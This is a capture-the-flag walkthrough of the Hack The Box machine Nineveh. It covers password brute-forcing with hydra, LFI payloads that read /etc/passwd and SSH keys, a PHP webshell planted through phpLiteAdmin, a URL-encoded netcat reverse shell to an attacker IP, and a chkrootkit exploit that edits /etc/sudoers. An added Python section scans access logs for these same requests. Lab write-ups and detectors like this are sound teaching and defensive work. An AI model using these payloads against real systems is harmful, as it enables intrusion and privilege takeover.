Nineveh — HTB Walkthrough

Dhanishtha Awasthi
5 min read · Jul 14, 2020

ENUMERATION

Nmap Scan

Adding nineveh.htb to hosts

80 HTTP ENUMERATION

Visiting website shows

Gobuster Scan and nikto scan

Department

Visiting website and source code

When we try to log in as amrois : amrois, it says wrong username. When we try admin : admin, it says wrong password, which confirms that admin is a valid username. Tried SQL injection, but it didn't work. Running a gobuster scan again on department

After enumerating a lot, I found there is no option left apart from brute-forcing the password. Capture the request in Burp

Now use hydra with the rockyou.txt wordlist

We got the password

admin : 1q2w3e4r5t

Checking notes we see

LFI used further after 443

php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd : works

php://filter/convert.base64-encode/resource=../../../../../../../../home/amrois/.ssh/id_rsa : Gives us file name too long

443 ENUMERATION

Nikto Scan

Gobuster Scan revealed

Visiting /db

After enumerating a lot on phpLiteAdmin, I couldn't find a good exploit. So we brute-forced db/index.php

Capture on burp

Using hydra, we get the password: password123 (run hydra with rockyou.txt for the password and username admin; the username doesn't make a difference, since there is no user defined)

Logging in

We see we have access to the DB, and we have an exploit for RCE

Going as per exploit

Creating DB : hack.php ; Table : shell ; Field name : malicious field ; Default value : malicious code

This did not work when triggered through the LFI, which will be shown with the real exploit in a minute. So now, instead of making a field whose default value contains the malicious code, we will create a field whose name contains the malicious code

hack.php doesn't work, because the LFI needs the name ninevehNotes

DB : ninevehNotes.php ; table : shell ; Field Name : <?php echo system($_REQUEST["cmd"]); ?> ; default value : text (null)

And it worked

EXPLOITATION

For getting a shell we will send a URL-encoded reverse shell. I first used URL-encoded nc -nv 10.10.14.16 1234 -e /bin/sh, but that didn't work, so we will use a pipe.

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%31%36%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66
Upper bar shows the LFI request format; lower terminal shows the Netcat output
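Seen from the detection side, the LFI and webshell requests above leave a clear trail in the web server's access log. The following is an added example, not part of the original write-up: a small Python scanner that percent-decodes each query string (including double encoding) and flags stream wrappers, traversal and absolute paths in the `notes` parameter, plus shell metacharacters in any other parameter. The log lines, the `files/ninevehNotes.txt` baseline path and the rule labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines, modelled on the requests in this walkthrough.
SAMPLE_LOG = """\
10.10.14.16 - - [14/Jul/2020:10:00:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 1024
10.10.14.16 - - [14/Jul/2020:10:00:09 +0000] "GET /department/manage.php?notes=php://filter/convert.base64-encode/resource=../../../../etc/passwd HTTP/1.1" 200 2048
10.10.14.16 - - [14/Jul/2020:10:00:30 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%69%64%3b%75%6e%61%6d%65 HTTP/1.1" 200 512
10.10.14.16 - - [14/Jul/2020:10:00:41 +0000] "GET /department/manage.php?notes=files%252f..%252f..%252fninevehNotes.txt HTTP/1.1" 200 300
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;|&`$<>]")
# Rules for the file-include parameter; the labels are names chosen for this example.
NOTES_RULES = [
    ("stream-wrapper", re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)),
    ("path-traversal", re.compile(r"(^|[\\/=])\.\.([\\/]|$)")),
    ("absolute-path", re.compile(r"^[\\/]")),
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(request_target):
    """Return the sorted findings for one request target (path plus query)."""
    findings = set()
    query = request_target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl has already decoded once
        if name == "notes":
            findings.update(label for label, rx in NOTES_RULES if rx.search(value))
        elif SHELL_META.search(value):
            findings.add("shell-metacharacters")
    return sorted(findings)

def scan(log_text):
    """Return [(line_number, findings)] for each log line with a finding."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits
```

Calling `scan(SAMPLE_LOG)` flags lines 2, 3 and 4 and leaves the baseline request on line 1 alone.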

GETTING USER

Transfer both images to the attacker machine

Running strings on both, we see that Nineveh.png gave SSH keys (private key and public key)

So we check knockd.conf to see SSH rules

Simply running SSH against this doesn't work, so we need to run an nmap scan on each of the ports mentioned above, in the same order

And now SSH in as amrois. We can get USER.txt

PRIVILEGE ESCALATION

cronjob running

We see that every minute a report is generated in the report folder, which is accessed by report-reset.sh. This is done by chkrootkit, which is vulnerable to an exploit: when there is no valid file name, it takes input from /tmp/update.

https://www.exploit-db.com/exploits/33899

So we will manipulate the update file in the tmp directory (we will create the file /tmp/update) and have it change the permissions of /etc/sudoers, write amrois into sudoers so that no authentication is required for running sudo commands, and then restore the permissions of /etc/sudoers

ROOTED !!!
